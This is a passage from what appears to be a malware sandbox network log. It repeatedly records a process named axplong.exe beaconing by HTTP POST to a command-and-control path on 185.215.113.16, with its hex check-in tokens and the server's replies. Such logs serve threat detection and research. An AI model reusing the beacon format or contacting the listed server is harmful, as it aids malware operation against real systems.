                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:49.902822971 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.749749185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:50.024514914 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:50.728672028 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:50.729564905 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:50.959990025 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.749750185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:51.090655088 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:51.789194107 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:51.794341087 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:52.018054008 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.749751185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:52.133939981 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:52.883769035 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:52.884602070 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:53.140917063 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.749752185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:53.259809971 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:53.964808941 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:53.965877056 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:54.190242052 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.749753185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:54.306905031 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:55.015114069 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:55.016233921 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:55.245140076 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.749754185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:55.352986097 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:56.059129000 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:56.061546087 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:56.292239904 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.749755185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:56.404169083 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:57.107424021 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:57.108181000 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:57.331981897 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.749756185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:57.448008060 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:58.156274080 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:58.157058001 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:58.416165113 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.749757185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:58.525059938 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:59.251431942 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:59.252312899 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:59.484220028 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.749758185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:59.603645086 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:00.328620911 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:30:00.331284046 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:00.555938959 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    52192.168.2.749759185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:00.664974928 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:01.371134043 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:30:01.371953964 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:01.614501953 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    53192.168.2.749760185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:01.728640079 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:02.446580887 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:30:02.452934980 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
